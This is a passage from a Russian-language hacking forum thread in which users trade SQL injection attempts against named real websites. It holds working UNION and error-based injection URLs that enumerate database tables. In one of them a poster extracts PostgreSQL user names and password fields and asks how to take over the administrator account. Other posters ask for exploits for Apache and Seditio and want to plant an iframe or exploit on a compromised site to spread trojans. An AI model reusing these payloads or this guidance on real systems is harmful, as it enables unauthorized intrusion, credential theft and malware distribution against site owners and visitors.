попробуй проделать вышеописанные тобой действия с помощью sqltool и дальше TableName и FieldName Bruteforce
Меня всегда интересовал ворпос а безопастно ли вот так проверять: if($_SESSION['valid_user']) { // бла бла бла } и можно ли как-нить подменить эту переменную в сесии? и как вообще правильно писать такую верификацию?
в принципе не возможно.. только в случае тупоумности программистом, если они сешн через экстракт прогоняют.. тогда в теории можно.. но лично не встречал
http://www.kaznpu.kz/kz/?annons=-1+union+select+TABLE_NAME+from+INFORMATION_SCHEMA. TABLES+limit+20,1/* выдало таблицу: moderator Почему вот этот не проходит: http://www.kaznpu.kz/kz/?annons=-1+union+select+COLUMN_NAME+from+INFORMATION_SCHEMA .COLUMNS+where+TABLE_NAME=moderator+limit+0,1/*
У меня такой вопрос: База даных : Mssql. Я пробывать зделать по этой стате : http://forum.antichat.ru/thread30501-mssql.html Первый этап прошол: www.*****.com/?id=1' Microsoft OLE DB Provider for SQL Server error '80040e14' Line 1: Incorrect syntax near 'application'. /index.asp, line 89 второй : www.*****.com/?id=1'%20or%201=(select%20db_name())-- Microsoft OLE DB Provider for SQL Server error '80040e07' Syntax error converting the nvarchar value 'player' to a column of data type int. /index.asp, line 89 третий: www.****.com/?id=1'+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)-- Microsoft OLE DB Provider for SQL Server error '80040e07' Syntax error converting the nvarchar value 'points' to a column of data type int. /index.asp, line 89 четвёртый: www.*****.com/?id=1'+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+('points'))-- Microsoft OLE DB Provider for SQL Server error '80040e07' Syntax error converting the nvarchar value 'points' to a column of data type int. /index.asp, line 89 Пятый: И тут я застрял,надо: id=1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+('table1','table2',........,'table50'))-- Что то у меня не получилось и я получил: Microsoft OLE DB Provider for SQL Server error '80040e14' Line 1: Incorrect syntax near 'table1'. /index.asp, line 89 Что мне дальше делать,или где моя ошибка? Огромное спасибо!
Выручайте.Нашел в сайте Apache , chunked encoding уязвимость.(если баян, ногами не пинать).Что нужно для взлома (эксплоит, или еще что то)? Нашел в Seditio SQL инъекцию (2).Опятьже прошу дать ссылку, или обьяснить, как эту дырку использовать (на сайте и в поиске не нашел)...И еще : как исправить SQL инъекцию?
ВОпрост такое вообще взламывается? Server Error in '/' Application. Input string was not in a correct format. Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code. Exception Details: System.FormatException: Input string was not in a correct format. Source Error: An unhandled exception was generated during the execution of the current web request. Information regarding the origin and location of the exception can be identified using the exception stack trace below. Stack Trace: [FormatException: Input string was not in a correct format.] System.Number.ParseInt32(String s, NumberStyles style, NumberFormatInfo info) +0 System.Convert.ToInt32(String value) +47 ustu.subs.Page_Load(Object sender, EventArgs e) in \\snatch\c$\Inetpub\dynamic\ustu.ru\subs.ascx.cs:38 System.Web.UI.Control.OnLoad(EventArgs e) +67 System.Web.UI.Control.LoadRecursive() +35 System.Web.UI.Control.LoadRecursive() +98 System.Web.UI.Control.LoadRecursive() +98 System.Web.UI.Control.LoadRecursive() +98 System.Web.UI.Page.ProcessRequestMain() +750 Version Information: Microsoft .NET Framework Version:1.1.4322.2407; ASP.NET Version:1.1.4322.2407
народ подскажите неучу. вот есть у меня скуль инекция как мне на индех.пхп повесить ифрейм или там сплойтег или че нить такое карочь изменить? да я тут просто решил затроянить инет не знаю че делать на ФТП денег у менянету а другие способы загрузок я не знаю не подскажеШЬ?КАК ЕЩЕ МОЖНО ИНСТАЛИТЬ
Никак. Тока если у тебя не инъекция через insert или update, затрагивающая, например, таблицу с новостями, выводящимися на главную Ну если ты нашёл, то ты и должен знать что это за уязвимость и как её использовать. Нашел в Seditio SQL инъекцию (2).Опятьже прошу дать ссылку, или обьяснить, как эту дырку использовать (на сайте и в поиске не нашел)...И еще : как исправить SQL инъекцию?[/QUOTE] Опять же, если нашёл, то должен знать как использовать. http://injection.rulezz.ru/
http://www.sports.kz/index.php?st=-1' как юзать? что то ничего там не катит толи фильтры толи хз даже пробел затолкать не могу
http://www.colan.ru/prices/level2n.php?id_group=99999999999999999+;+select+nu ll,version(),null,4,null,null,null,null,null,null, null,null,null,null,null,null,null,null-- PostgreSQL 7.4.7 on i386-portbld-freebsd5.3, compiled by GCC cc (GCC) 3.4.2 [FreeBSD] 20040728 http://www.colan.ru/prices/level2n.php?id_group=99999999999999999+;+select+1, TABLE_NAME,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8+from+information_schema.tables+-- выводит много интересного, но я выбрал pg_user http://www.colan.ru/prices/level2n.php?id_group=99999999999999999+;+select+nu ll,COLUMN_NAME,null,null,null,null,null,null,null, null,null,null,null,null,null,null,null,null+from+ information_schema.columns+where+table_name=(selec t+TABLE_NAME+from+information_schema.tables+limit+ 1+offset+43)-- результат: usecatupd usesuper usecreatedb usename usesysid passwd valuntil useconfig http://www.colan.ru/prices/level2n.php?id_group=99999999999999999+;+select+nu ll,usename,null,null,null,null,null,null,null,null ,null,null,null,null,null,null,null,null+from+pg_u ser-- http://www.colan.ru/prices/level2n.php?id_group=99999999999999999+;+select+nu ll,passwd,null,null,null,null,null,null,null,null, null,null,null,null,null,null,null,null+from+pg_us er-- первый это админ login: postgres pass: ******** Так вот вопрос по существу как пароли то вытащить, я пробовал даже тип поля помнять с hide что-то не могу... разьве что e-mail сменить и воспользоваться воостановлением пароля....
